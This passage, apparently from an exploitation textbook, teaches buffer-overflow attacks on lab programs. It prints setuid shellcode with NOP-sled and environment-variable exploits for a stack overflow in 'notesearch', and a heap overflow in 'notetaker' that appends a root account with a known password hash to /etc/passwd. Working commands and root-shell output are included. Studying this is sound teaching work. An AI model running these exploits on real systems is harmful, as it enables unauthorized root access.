DESKTOP_SESSION=default.desktop

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

GDM_XSERVER_LOCATION=local

PWD=/home/reader/booksrc

LANG=en_US.UTF-8

GDMSESSION=default.desktop

HISTCONTROL=ignoreboth

HOME=/home/reader

SHLVL=1

GNOME_DESKTOP_SESSION_ID=Default

LOGNAME=reader

DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-

DxW6W1OH1O,guid=4f4e0e9cc6f68009a059740046e28e35

LESSOPEN=| /usr/bin/lesspipe %s

DISPLAY=:0.0

MYVAR=test

LESSCLOSE=/usr/bin/lesspipe %s %s

RUNNING_UNDER_GDM=yes

COLORTERM=gnome-terminal

XAUTHORITY=/home/reader/.Xauthority

_=/usr/bin/env

reader@hacking:~/booksrc $
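
Inside a process, the environment shown by env is just a NULL-terminated array of NAME=value strings. As a rough sketch of how a lookup over such an array works, the following C function searches one passed in as a parameter. The function name is hypothetical; real programs would normally call the standard getenv() instead.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Search a NULL-terminated array of "NAME=value" strings (the layout used
   for a process environment) and return a pointer to the value part, or
   NULL if the name is not present. */
static const char *find_env_value(const char *const envp[], const char *name)
{
    size_t name_len, i;

    assert(envp != NULL && name != NULL);
    name_len = strlen(name);
    for (i = 0; envp[i] != NULL; i++) {
        /* The name must match in full and be followed directly by '='. */
        if (strncmp(envp[i], name, name_len) == 0 && envp[i][name_len] == '=')
            return envp[i] + name_len + 1;
    }
    return NULL;
}
```

Given an array containing "USER=reader" and "MYVAR=test", looking up MYVAR returns a pointer to the text test. The returned pointer refers to memory inside the original string, which is the property that matters in the rest of this section.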

Similarly, the shellcode can be put in an environment variable, but first it needs to be in a form we can easily manipulate. The shellcode from the notesearch exploit can be used; we just need to put it into a file in binary form. The standard shell tools of head, grep, and cut can be used to isolate just the hex-expanded bytes of the shellcode.

reader@hacking:~/booksrc $ head exploit_notesearch.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

char shellcode[]=

"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"

"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"

"\xe1\xcd\x80";

int main(int argc, char *argv[]) {

unsigned int i, *ptr, ret, offset=270;

reader@hacking:~/booksrc $ head exploit_notesearch.c | grep "^\""

"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"

"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"

"\xe1\xcd\x80";

reader@hacking:~/booksrc $ head exploit_notesearch.c | grep "^\"" | cut -d\" -f2

\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68

\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89

\xe1\xcd\x80

reader@hacking:~/booksrc $

The first 10 lines of the program are piped into grep, which only shows the lines that begin with a quotation mark. This isolates the lines containing the shellcode, which are then piped into cut using options to display only the bytes between two quotation marks.

BASH's for loop can actually be used to send each of these lines to an echo command, with command-line options to recognize hex expansion and to suppress adding a newline character to the end.

reader@hacking:~/booksrc $ for i in $(head exploit_notesearch.c | grep "^\"" | cut -d\"

-f2)

> do

> echo -en $i

> done > shellcode.bin

reader@hacking:~/booksrc $ hexdump -C shellcode.bin

00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1.1.1......j.XQh|

00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 |//shh/bin..Q..S.|

00000020 e1 cd 80 |...|

00000023

reader@hacking:~/booksrc $

Now we have the shellcode in a file called shellcode.bin. This can be used with command substitution to put shellcode into an environment variable, along with a generous NOP sled.
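
The conversion from the text \x31 to the single byte 0x31 is the step that echo -en performs in the loop above. A minimal C sketch of that decoding is shown below. It handles only the two-digit \xHH form used in this file, which is narrower than what echo accepts, and the function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* Value of one hexadecimal digit, or -1 if c is not a hex digit. */
static int hex_digit_value(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Convert text made only of \xHH escapes into raw bytes. Returns the
   number of bytes written, or -1 on malformed input or if out is full. */
static long decode_hex_escapes(const char *text, unsigned char *out, size_t cap)
{
    size_t n = 0;

    assert(text != NULL && out != NULL);
    while (*text != '\0') {
        int hi, lo;

        if (text[0] != '\\' || text[1] != 'x')
            return -1;
        hi = hex_digit_value(text[2]);
        if (hi < 0)
            return -1;
        lo = hex_digit_value(text[3]);
        if (lo < 0)
            return -1;
        if (n >= cap)
            return -1;
        out[n++] = (unsigned char)(hi * 16 + lo);
        text += 4;                          /* skip past one \xHH group */
    }
    return (long)n;
}
```

Decoding the last line of the shellcode text, \xe1\xcd\x80, produces the three bytes e1 cd 80, matching the final row of the hexdump output.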

reader@hacking:~/booksrc $ export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat

shellcode.bin)

reader@hacking:~/booksrc $ echo $SHELLCODE

␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣

␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣

␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣1␣1␣1␣␣␣ j

XQh//shh/bin␣␣Q␣␣S␣␣

reader@hacking:~/booksrc $

And just like that, the shellcode is now on the stack in an environment variable, along with a 200-byte NOP sled. This means we just need to find an address somewhere in that range of the sled to overwrite the saved return address with. The environment variables are located near the bottom of the stack, so this is where we should look when running notesearch in a debugger.

reader@hacking:~/booksrc $ gdb -q ./notesearch

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) break main

Breakpoint 1 at 0x804873c

(gdb) run

Starting program: /home/reader/booksrc/notesearch

Breakpoint 1, 0x0804873c in main ()

(gdb)

A breakpoint is set at the beginning of main(), and the program is run. This will set up memory for the program, but it will stop before anything happens. Now we can examine memory down near the bottom of the stack.

(gdb) i r esp

esp 0xbffff660 0xbffff660

(gdb) x/24s $esp + 0x240

0xbffff8a0: ""

0xbffff8a1: ""

0xbffff8a2: ""

0xbffff8a3: ""

0xbffff8a4: ""

0xbffff8a5: ""

0xbffff8a6: ""

0xbffff8a7: ""

0xbffff8a8: ""

0xbffff8a9: ""

0xbffff8aa: ""

0xbffff8ab: "i686"

0xbffff8b0: "/home/reader/booksrc/notesearch"

0xbffff8d0: "SSH_AGENT_PID=7531"

0xbffff8e3: "SHELLCODE=", '\220' <repeats 190 times>...

0xbffff9ab: "\220\220\220\220\220\220\220\220\220\2201�1�1�\231���\200j\vXQh//

shh/bin\211�Q\211�S\211��\200"

0xbffff9d9: "TERM=xterm"

0xbffff9e4: "DESKTOP_STARTUP_ID="

0xbffff9f8: "SHELL=/bin/bash"

0xbffffa08: "GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/.gtkrc-1.2-gnome2"

0xbffffa43: "WINDOWID=39845969"

0xbffffa55: "USER=reader"

0xbffffa61:

"LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;

33;01:or=

40;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:

*.arj=01

;31:*.taz=0"...

0xbffffb29:

"1;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:

*.rpm=01;3

1:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:

*.ppm=01

;35:*.tga=0"...

(gdb) x/s 0xbffff8e3

0xbffff8e3: "SHELLCODE=", '\220' <repeats 190 times>...

(gdb) x/s 0xbffff8e3 + 100

0xbffff947: '\220' <repeats 110 times>, "1�1�1�\231���\200j\vXQh//shh/bin\

211�Q\211�S\211��\200"

(gdb)

The debugger reveals the location of the shellcode: the SHELLCODE variable starts at 0xbffff8e3. (When the program is run outside of the debugger, these addresses might be a little different.) The debugger also has some information on the stack, which shifts the addresses around a bit. But with a 200-byte NOP sled, these inconsistencies aren't a problem if an address near the middle of the sled is picked. In the output above, the address 0xbffff947 is shown to be close to the middle of the NOP sled, which should give us enough wiggle room. After determining the address of the injected shellcode instructions, the exploitation is simply a matter of overwriting the return address with this address.

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x47\xf9\xff\xbf"x40')

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

-------[ end of note data ]-------

sh-3.2# whoami

root

sh-3.2#

The target address is repeated enough times to overflow the return address, and execution returns into the NOP sled in the environment variable, which inevitably leads to the shellcode. In situations where the overflow buffer isn't large enough to hold shellcode, an environment variable can be used with a large NOP sled. This usually makes exploitations quite a bit easier.

A huge NOP sled is a great aid when you need to guess at the target return addresses, but it turns out that the locations of environment variables are easier to predict than the locations of local stack variables. In C's standard library there is a function called getenv(), which accepts the name of an environment variable as its only argument and returns that variable's memory address. The code in getenv_example.c demonstrates the use of getenv().

getenv_example.c

#include <stdio.h>

#include <stdlib.h>

int main(int argc, char *argv[]) {

printf("%s is at %p\n", argv[1], getenv(argv[1]));

}

When compiled and run, this program will display the location of a given environment variable in its memory. This provides a much more accurate prediction of where the same environment variable will be when the target program is run.

reader@hacking:~/booksrc $ gcc getenv_example.c

reader@hacking:~/booksrc $ ./a.out SHELLCODE

SHELLCODE is at 0xbffff90b

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x0b\xf9\xff\xbf"x40')

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

-------[ end of note data ]-------

sh-3.2#

This is accurate enough with a large NOP sled, but when the same thing is attempted without a sled, the program crashes. This means the environment prediction is still off.

reader@hacking:~/booksrc $ export SLEDLESS=$(cat shellcode.bin)

reader@hacking:~/booksrc $ ./a.out SLEDLESS

SLEDLESS is at 0xbfffff46

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x46\xff\xff\xbf"x40')

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

-------[ end of note data ]-------

Segmentation fault

reader@hacking:~/booksrc $

In order to be able to predict an exact memory address, the differences in the addresses must be explored. The length of the name of the program being executed seems to have an effect on the address of the environment variables. This effect can be further explored by changing the name of the program and experimenting. This type of experimentation and pattern recognition is an important skill for a hacker to have.

reader@hacking:~/booksrc $ cp a.out a

reader@hacking:~/booksrc $ ./a SLEDLESS

SLEDLESS is at 0xbfffff4e

reader@hacking:~/booksrc $ cp a.out bb

reader@hacking:~/booksrc $ ./bb SLEDLESS

SLEDLESS is at 0xbfffff4c

reader@hacking:~/booksrc $ cp a.out ccc

reader@hacking:~/booksrc $ ./ccc SLEDLESS

SLEDLESS is at 0xbfffff4a

reader@hacking:~/booksrc $ ./a.out SLEDLESS

SLEDLESS is at 0xbfffff46

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0xbfffff4e - 0xbfffff46

$1 = 8

(gdb) quit

reader@hacking:~/booksrc $

As the preceding experiment shows, the length of the name of the executing program has an effect on the location of exported environment variables. The general trend seems to be a decrease of two bytes in the address of the environment variable for every single-byte increase in the length of the program name. This holds true with the program name a.out, since the difference in length between the names a.out and a is four bytes, and the difference between the address 0xbfffff4e and 0xbfffff46 is eight bytes. This must mean the name of the executing program is also located on the stack somewhere, which is causing the shifting.

Armed with this knowledge, the exact address of the environment variable can be predicted when the vulnerable program is executed. This means the crutch of a NOP sled can be eliminated. The getenvaddr.c program adjusts the address based on the difference in program name length to provide a very accurate prediction.

getenvaddr.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

int main(int argc, char *argv[]) {

char *ptr;

if(argc < 3) {

printf("Usage: %s <environment var> <target program name>\n", argv[0]);

exit(0);

}

ptr = getenv(argv[1]); /* Get env var location. */

ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* Adjust for program name. */

printf("%s will be at %p\n", argv[1], ptr);

}

When compiled, this program can accurately predict where an environment variable will be in memory during a target program's execution. This can be used to exploit stack-based buffer overflows without the need for a NOP sled.

reader@hacking:~/booksrc $ gcc -o getenvaddr getenvaddr.c

reader@hacking:~/booksrc $ ./getenvaddr SLEDLESS ./notesearch

SLEDLESS will be at 0xbfffff3c

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x3c\xff\xff\xbf"x40')

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

As you can see, exploit code isn't always needed to exploit programs. The use of environment variables simplifies things considerably when exploiting from the command line, but these variables can also be used to make exploit code more reliable.

The system() function is used in the exploit_notesearch.c program to execute a command. This function starts a new process and runs the command using /bin/sh -c. The -c tells the sh program to execute commands from the command-line argument passed to it. Google's code search can be used to find the source code for this function, which will tell us more. Go to http://www.google.com/codesearch?q=package:libc+system to see this code in its entirety.

Code from libc-2.2.2

int system(const char * cmd)

{

int ret, pid, waitstat;

void (*sigint) (), (*sigquit) ();

if ((pid = fork()) == 0) {

execl("/bin/sh", "sh", "-c", cmd, NULL);

exit(127);

}

if (pid < 0) return(127 << 8);

sigint = signal(SIGINT, SIG_IGN);

sigquit = signal(SIGQUIT, SIG_IGN);

while ((waitstat = wait(&ret)) != pid && waitstat != -1);

if (waitstat == -1) ret = -1;

signal(SIGINT, sigint);

signal(SIGQUIT, sigquit);

return(ret);

}

The important part of this function is the code that runs in the child process, inside the first if block. The fork() function starts a new process, and the execl() function is used to run the command through /bin/sh with the appropriate command-line arguments.

The use of system() can sometimes cause problems. If a setuid program uses system(), the privileges won't be transferred, because /bin/sh has been dropping privileges since version two. This isn't the case with our exploit, but the exploit doesn't really need to be starting a new process, either. We can ignore the fork() and just focus on the execl() function to run the command.

The execl() function belongs to a family of functions that execute commands by replacing the current process with the new one. The arguments for execl() start with the path to the target program and are followed by each of the command-line arguments. The second function argument is actually the zeroth command-line argument, which is the name of the program. The last argument is a NULL to terminate the argument list, similar to how a null byte terminates a string.

The execl() function has a sister function called execle(), which has one additional argument to specify the environment under which the executing process should run. This environment is presented in the form of an array of pointers to null-terminated strings for each environment variable, and the environment array itself is terminated with a NULL pointer.

With execl(), the existing environment is used, but if you use execle(), the entire environment can be specified. If the environment array is just the shellcode as the first string (with a NULL pointer to terminate the list), the only environment variable will be the shellcode. This makes its address easy to calculate. In Linux, the address will be 0xbffffffa, minus the length of the shellcode in the environment, minus the length of the name of the executed program. Since this address will be exact, there is no need for a NOP sled. All that's needed in the exploit buffer is the address, repeated enough times to overflow the return address in the stack, as shown in exploit_notesearch_env.c.

exploit_notesearch_env.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

char shellcode[]=

"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"

"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"

"\xe1\xcd\x80";

int main(int argc, char *argv[]) {

char *env[2] = {shellcode, 0};

unsigned int i, ret;

char *buffer = (char *) malloc(160);

ret = 0xbffffffa - (sizeof(shellcode)-1) - strlen("./notesearch");

for(i=0; i < 160; i+=4)

*((unsigned int *)(buffer+i)) = ret;

execle("./notesearch", "notesearch", buffer, 0, env);

free(buffer);

}

This exploit is more reliable, since it doesn't need a NOP sled or any guesswork regarding offsets. Also, it doesn't start any additional processes.

reader@hacking:~/booksrc $ gcc exploit_notesearch_env.c

reader@hacking:~/booksrc $ ./a.out

-------[ end of note data ]-------

sh-3.2#

Overflows in Other Segments

Buffer overflows can happen in other memory segments, like heap and bss. As in auth_overflow.c, if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered. This is true regardless of the memory segment these variables reside in; however, the control tends to be quite limited. Being able to find these control points and learning to make the most of them just takes some experience and creative thinking. While these types of overflows aren't as standardized as stack-based overflows, they can be just as effective.

A Basic Heap-Based Overflow

The notetaker program from Chapter 0x200 is also susceptible to a buffer overflow vulnerability. Two buffers are allocated on the heap, and the first command-line argument is copied into the first buffer. An overflow can occur here.

Excerpt from notetaker.c

buffer = (char *) ec_malloc(100);

datafile = (char *) ec_malloc(20);

strcpy(datafile, "/var/notes");

if(argc < 2) // If there aren't command-line arguments,

usage(argv[0], datafile); // display usage message and exit.

strcpy(buffer, argv[1]); // Copy into buffer.

printf("[DEBUG] buffer @ %p: \'%s\'\n", buffer, buffer);

printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);

Under normal conditions, the buffer allocation is located at 0x804a008, which is before the datafile allocation at 0x804a070, as the debugging output shows. The distance between these two addresses is 104 bytes.

reader@hacking:~/booksrc $ ./notetaker test

[DEBUG] buffer @ 0x804a008: 'test'

[DEBUG] datafile @ 0x804a070: '/var/notes'

[DEBUG] file descriptor is 3

Note has been saved.

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0x804a070 - 0x804a008

$1 = 104

(gdb) quit

reader@hacking:~/booksrc $

Since the first buffer is null terminated, the maximum amount of data that can be put into this buffer without overflowing into the next should be 103 bytes.

reader@hacking:~/booksrc $ ./notetaker $(perl -e 'print "A"x104')

[DEBUG] buffer @ 0x804a008: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

[DEBUG] datafile @ 0x804a070: ''

[!!] Fatal Error in main() while opening file: No such file or directory

reader@hacking:~/booksrc $

As predicted, when 104 bytes are tried, the null-termination byte overflows into the beginning of the datafile buffer. This causes the datafile to be nothing but a single null byte, which obviously cannot be opened as a file. But what if the datafile buffer is overwritten with something more than just a null byte?

reader@hacking:~/booksrc $ ./notetaker $(perl -e 'print "A"x104 . "testfile"')

[DEBUG] buffer @ 0x804a008: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtestfile'

[DEBUG] datafile @ 0x804a070: 'testfile'

[DEBUG] file descriptor is 3

Note has been saved.

*** glibc detected *** ./notetaker: free(): invalid next size (normal): 0x0804a008 ***

======= Backtrace: =========

/lib/tls/i686/cmov/libc.so.6[0xb7f017cd]

/lib/tls/i686/cmov/libc.so.6(cfree+0x90)[0xb7f04e30]

./notetaker[0x8048916]

/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xdc)[0xb7eafebc]

./notetaker[0x8048511]

======= Memory map: ========

08048000-08049000 r-xp 00000000 00:0f 44384 /cow/home/reader/booksrc/notetaker

08049000-0804a000 rw-p 00000000 00:0f 44384 /cow/home/reader/booksrc/notetaker

0804a000-0806b000 rw-p 0804a000 00:00 0 [heap]

b7d00000-b7d21000 rw-p b7d00000 00:00 0

b7d21000-b7e00000 ---p b7d21000 00:00 0

b7e83000-b7e8e000 r-xp 00000000 07:00 15444 /rofs/lib/libgcc_s.so.1

b7e8e000-b7e8f000 rw-p 0000a000 07:00 15444 /rofs/lib/libgcc_s.so.1

b7e99000-b7e9a000 rw-p b7e99000 00:00 0

b7e9a000-b7fd5000 r-xp 00000000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so

b7fd5000-b7fd6000 r--p 0013b000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so

b7fd6000-b7fd8000 rw-p 0013c000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so

b7fd8000-b7fdb000 rw-p b7fd8000 00:00 0

b7fe4000-b7fe7000 rw-p b7fe4000 00:00 0

b7fe7000-b8000000 r-xp 00000000 07:00 15421 /rofs/lib/ld-2.5.so

b8000000-b8002000 rw-p 00019000 07:00 15421 /rofs/lib/ld-2.5.so

bffeb000-c0000000 rw-p bffeb000 00:00 0 [stack]

ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso]

Aborted

reader@hacking:~/booksrc $

This time, the overflow is designed to overwrite the datafile buffer with the string testfile. This causes the program to write to testfile instead of /var/notes, as it was originally programmed to do. However, when the heap memory is freed by the free() function, errors in the heap headers are detected and the program is terminated. Similar to the return address overwrite with stack overflows, there are control points within the heap architecture itself. The most recent version of glibc uses heap memory management functions that have evolved specifically to counter heap unlinking attacks. Since version 2.2.5, these functions have been rewritten to print debugging information and terminate the program when they detect problems with the heap header information. This makes heap unlinking in Linux very difficult. However, this particular exploit doesn't use heap header information to do its magic, so by the time free() is called, the program has already been tricked into writing to a new file with root privileges.

reader@hacking:~/booksrc $ grep -B10 free notetaker.c

if(write(fd, buffer, strlen(buffer)) == -1) // Write note.

fatal("in main() while writing buffer to file");

write(fd, "\n", 1); // Terminate line.

// Closing file

if(close(fd) == -1)

fatal("in main() while closing file");

printf("Note has been saved.\n");

free(buffer);

free(datafile);

reader@hacking:~/booksrc $ ls -l ./testfile

-rw------- 1 root reader 118 2007-09-09 16:19 ./testfile

reader@hacking:~/booksrc $ cat ./testfile

cat: ./testfile: Permission denied

reader@hacking:~/booksrc $ sudo cat ./testfile

?

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAA

AAAAAAAAAtestfile

reader@hacking:~/booksrc $

A string is read until a null byte is encountered, so the entire string is written to the file as the user input. Since this is a suid root program, the file that is created is owned by root. This also means that since the filename can be controlled, data can be appended to any file. This data does have some restrictions, though; it must end with the controlled filename, and a line with the user ID will be written, also.

There are probably several clever ways to exploit this type of capability. The most apparent one would be to append something to the /etc/passwd file. This file contains all of the usernames, IDs, and login shells for all the users of the system. Naturally, this is a critical system file, so it is a good idea to make a backup copy before messing with it too much.

reader@hacking:~/booksrc $ cp /etc/passwd /tmp/passwd.bkup

reader@hacking:~/booksrc $ head /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

reader@hacking:~/booksrc $

The fields in the /etc/passwd file are delimited by colons, the first field being for login name, then password, user ID, group ID, username, home directory, and finally the login shell. The password fields are all filled with the x character, since the encrypted passwords are stored elsewhere in a shadow file. (However, this field can contain the encrypted password.) In addition, any entry in the password file that has a user ID of 0 will be given root privileges. That means the goal is to append an extra entry with both root privileges and a known password to the password file.

The password can be encrypted using a one-way hashing algorithm. Because the algorithm is one way, the original password cannot be recreated from the hash value. To prevent lookup attacks, the algorithm uses a salt value, which when varied creates a different hash value for the same input password. This is a common operation, and Perl has a crypt() function that performs it. The first argument is the password, and the second is the salt value. The same password with a different salt produces a different hash.

reader@hacking:~/booksrc $ perl -e 'print crypt("password", "AA"). "\n"'

AA6tQYSfGxd/A

reader@hacking:~/booksrc $ perl -e 'print crypt("password", "XX"). "\n"'

XXq2wKiyI43A2

reader@hacking:~/booksrc $

Notice that the salt value is always at the beginning of the hash. When a user logs in and enters a password, the system looks up the encrypted password for that user. Using the salt value from the stored encrypted password, the system uses the same one-way hashing algorithm to encrypt whatever text the user typed as the password. Finally, the system compares the two hashes; if they are the same, the user must have entered the correct password. This allows the password to be used for authentication without requiring that the password be stored anywhere on the system.

Using one of these hashes in the password field will make the password for the account be password, regardless of the salt value used. The line to append to /etc/passwd should look something like this:

myroot:XXq2wKiyI43A2:0:0:me:/root:/bin/bash

However, the nature of this particular heap overflow exploit won't allow that exact line to be written to /etc/passwd, because the string must end with /etc/passwd. If that filename is merely appended to the end of the entry, the passwd file entry would be incorrect. This can be compensated for with the clever use of a symbolic file link, so the entry can both end with /etc/passwd and still be a valid line in the password file. Here's how it works:

reader@hacking:~/booksrc $ mkdir /tmp/etc

reader@hacking:~/booksrc $ ln -s /bin/bash /tmp/etc/passwd

reader@hacking:~/booksrc $ ls -l /tmp/etc/passwd

lrwxrwxrwx 1 reader reader 9 2007-09-09 16:25 /tmp/etc/passwd -> /bin/bash

reader@hacking:~/booksrc $

Now /tmp/etc/passwd points to the login shell /bin/bash. This means that a valid login shell for the password file is also /tmp/etc/passwd, making the following a valid password file line:

myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd

The values of this line just need to be slightly modified so that the portion before /etc/passwd is exactly 104 bytes long:

reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp"' | wc -c

38

reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x50 . ":/root:/tmp"' | wc -c

86

reader@hacking:~/booksrc $ gdb -q

(gdb) p 104 - 86 + 50

$1 = 68

(gdb) quit

reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x68 . ":/root:/tmp"' | wc -c

104

reader@hacking:~/booksrc $

If /etc/passwd is added to the end of that final 104-byte string, the string will be appended to the end of the /etc/passwd file. And since this line defines an account with root privileges with a password we set, it won't be difficult to access this account and obtain root access, as the following output shows.

reader@hacking:~/booksrc $ ./notetaker $(perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x68 . ":/root:/tmp/etc/passwd"')

[DEBUG] buffer @ 0x804a008: 'myroot:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:/root:/tmp/etc/passwd'

[DEBUG] datafile @ 0x804a070: '/etc/passwd'

[DEBUG] file descriptor is 3

Note has been saved.

*** glibc detected *** ./notetaker: free(): invalid next size (normal): 0x0804a008 ***

======= Backtrace: =========

/lib/tls/i686/cmov/libc.so.6[0xb7f017cd]

/lib/tls/i686/cmov/libc.so.6(cfree+0x90)[0xb7f04e30]

./notetaker[0x8048916]

/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xdc)[0xb7eafebc]

./notetaker[0x8048511]

======= Memory map: ========

08048000-08049000 r-xp 00000000 00:0f 44384 /cow/home/reader/booksrc/notetaker

08049000-0804a000 rw-p 00000000 00:0f 44384 /cow/home/reader/booksrc/notetaker

0804a000-0806b000 rw-p 0804a000 00:00 0 [heap]

b7d00000-b7d21000 rw-p b7d00000 00:00 0

b7d21000-b7e00000 ---p b7d21000 00:00 0

b7e83000-b7e8e000 r-xp 00000000 07:00 15444 /rofs/lib/libgcc_s.so.1

b7e8e000-b7e8f000 rw-p 0000a000 07:00 15444 /rofs/lib/libgcc_s.so.1

b7e99000-b7e9a000 rw-p b7e99000 00:00 0

b7e9a000-b7fd5000 r-xp 00000000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so

b7fd5000-b7fd6000 r--p 0013b000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so

b7fd6000-b7fd8000 rw-p 0013c000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so

b7fd8000-b7fdb000 rw-p b7fd8000 00:00 0

b7fe4000-b7fe7000 rw-p b7fe4000 00:00 0

b7fe7000-b8000000 r-xp 00000000 07:00 15421 /rofs/lib/ld-2.5.so

b8000000-b8002000 rw-p 00019000 07:00 15421 /rofs/lib/ld-2.5.so

bffeb000-c0000000 rw-p bffeb000 00:00 0 [stack]

ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso]

Aborted

reader@hacking:~/booksrc $ tail /etc/passwd

avahi:x:105:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false

cupsys:x:106:113::/home/cupsys:/bin/false

haldaemon:x:107:114:Hardware abstraction layer,,,:/home/haldaemon:/bin/false

hplip:x:108:7:HPLIP system user,,,:/var/run/hplip:/bin/false

gdm:x:109:118:Gnome Display Manager:/var/lib/gdm:/bin/false

matrix:x:500:500:User Acct:/home/matrix:/bin/bash

jose:x:501:501:Jose Ronnick:/home/jose:/bin/bash

reader:x:999:999:Hacker,,,:/home/reader:/bin/bash

?

myroot:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAA:/

root:/tmp/etc/passwd

reader@hacking:~/booksrc $ su myroot

Password:

root@hacking:/home/reader/booksrc# whoami

root

root@hacking:/home/reader/booksrc#

Overflowing Function Pointers

If you have played with the game_of_chance.c program enough, you will realize that, as at a casino, most of the games are statistically weighted in favor of the house. This makes winning credits difficult, no matter how lucky you might be. Perhaps there's a way to even the odds a bit. This program uses a function pointer to remember the last game played. This pointer is stored in the user structure, which is declared as a global variable. This means all the memory for the user structure is allocated in the bss segment.

From game_of_chance.c

// Custom user struct to store information about users

struct user {

